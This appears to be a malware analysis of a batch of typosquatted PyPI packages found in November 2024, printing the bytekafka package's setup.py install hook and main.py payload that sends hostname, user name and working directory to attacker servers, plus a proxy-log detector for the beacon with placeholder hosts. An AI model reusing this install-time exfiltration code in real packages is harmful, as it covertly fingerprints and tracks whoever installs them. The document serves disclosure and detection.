On 15 November 2024 the following batch of poisoned packages sharing common characteristics was found in the official Python package repository (PyPI):
- lightseeq, lightsequ, lightseqe
- bytekafka-0.0.15, bytekafka, bytekafka-0.15
- ASLMutetion, v2xlm-gml, v2mlx-gml, x2vml-gml
- BabetMF, BaibitMF, BebitMF
- nurst, nerst, nuest, nuerst
- byteseep, bytesip, bytesap
These malicious packages perform information collection (host fingerprinting). PyPI removed them roughly one day after they were published, but at the time of writing they could still be downloaded from the Tencent Cloud PyPI mirror, e.g. https://mirrors.cloud.tencent.com/pypi/simple/bytekafka/ . A takedown on pypi.org therefore does not immediately protect users who install through a mirror that has not yet synchronised the removal.
Analysis of the poisoning code
Taking the bytekafka package as an example, the attacker planted malicious code in the package. The relevant code is as follows:
# setup.py
from setuptools import setup, find_packages
from setuptools.command.install import install

# Custom install command: runs the normal install, then imports and executes
# main() from the sibling main.py, so the payload fires at install time.
class CrazyInstallStrat(install):
    def run(self):
        install.run(self)
        from main import main
        main()

setup(
    name="bytekafka",
    version="99.7",
    author="x",
    author_email="xxx@outlook.com",
    description="x",
    long_description_content_type="text/markdown",
    long_description="xxx",
    cmdclass={
        'install': CrazyInstallStrat,   # hooks the setuptools install command
    },
    install_requires=['requests'],      # declared, but never used by the payload
    setup_requires=['setuptools']
)
# main.py
import getpass
import logging
import os
import platform
import random
import urllib.parse
import urllib.request

def main():
    # Host fingerprint: hostname, OS user name and current working directory
    hostname = platform.node()
    username = getpass.getuser()
    current_path = os.getcwd()
    rd_num = random.randint(10000, 99999)   # random 5-digit path component per run
    urls = [
        # information-collection URL addresses (not reproduced here)
    ]
    for url in urls:
        params = {
            "packagename": "bytekafka",
            "hostname": hostname,
            "user": username,
            "path": current_path
        }
        # Exfiltration is a plain HTTP GET with the data in the query string;
        # the receiving server additionally sees the victim's source IP.
        full_url = f"{url}/realtime_p/pypi/{rd_num}?{urllib.parse.urlencode(params)}"
        try:
            with urllib.request.urlopen(full_url) as response:
                logging.info(response.read().decode())
        except Exception as e:
            logging.error(f"Could not reach {url}: {e}")
When a user installs the poisoned package with pip install, the hook in setup.py is triggered and calls main() from main.py, which sends the victim's hostname, user name and current working directory to the attacker's servers; the attacker also learns the victim's IP address from the source of the HTTP request. No code from the package needs to be imported for this to happen: the collection runs during the install step itself. Note also that the payload uses only the standard library (urllib); the declared requests dependency is never used, and the logging calls leave no visible trace under pip's default output.
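Because the beacon shape is shared across the batch (only the packagename value changes), it makes a usable network indicator: a GET to /realtime_p/pypi/ followed by a five-digit number with packagename, hostname, user and path in the query string. The following matcher is an added example written for this page, not code from the original analysis. The proxy log format (timestamp, client IP, method, URL, status) and the destination hosts are constructed; the hook is written against the URL, so adapting it to another log format only means changing the field split in scan_proxy_log.

```python
# Added example (not from the original post): detect the bytekafka-family
# exfiltration beacon in outbound proxy logs and recover the leaked fields.
import re
from urllib.parse import urlsplit, parse_qs

# Path pattern from the payload: /realtime_p/pypi/<random 10000-99999>
BEACON_PATH = re.compile(r"/realtime_p/pypi/\d{5}$")
# Query-string keys the payload always sends
LEAKED_KEYS = {"packagename", "hostname", "user", "path"}

# Constructed sample log: "<timestamp> <client_ip> <method> <url> <status>".
# Destination hosts are placeholders, not the real collection servers.
SAMPLE_PROXY_LOG = [
    "2024-11-15T10:21:03Z 10.0.5.17 GET https://pypi.org/simple/bytekafka/ 200",
    "2024-11-15T10:21:09Z 10.0.5.17 GET http://c2-a.example.invalid/realtime_p/pypi/48213"
    "?packagename=bytekafka&hostname=build-01&user=ci&path=%2Fhome%2Fci%2Fproject 200",
    "2024-11-15T10:22:41Z 10.0.5.22 GET https://files.pythonhosted.org/packages/x.whl 200",
    "2024-11-15T11:03:55Z 192.168.1.40 GET http://c2-b.example.invalid/realtime_p/pypi/71902"
    "?packagename=lightseqe&hostname=dev-laptop&user=alice&path=%2FUsers%2Falice%2Fsrc 200",
]


def match_beacon(url: str):
    """Return the leaked fields as a dict if url has the beacon shape, else None."""
    parts = urlsplit(url)
    if not BEACON_PATH.search(parts.path):
        return None
    qs = parse_qs(parts.query)
    if not LEAKED_KEYS.issubset(qs):
        return None
    return {key: qs[key][0] for key in sorted(LEAKED_KEYS)}


def scan_proxy_log(lines):
    """Yield one record per beacon hit: when, which internal client, and what leaked.
    The client IP is what the attacker's server learns from the request source."""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed line; constructed format has at least 4 fields
        ts, client_ip, _method, url = fields[:4]
        leaked = match_beacon(url)
        if leaked is not None:
            hits.append({"time": ts, "client_ip": client_ip, **leaked})
    return hits


if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_PROXY_LOG):
        print(hit)
```

Matching on the path and key set rather than on a host name is deliberate: the collection servers can change, and the batch used more than one, while the URL template is baked into every package. Each hit also tells the responder which build host or workstation to triage (client_ip, hostname, user) and, via packagename, which member of the batch was installed.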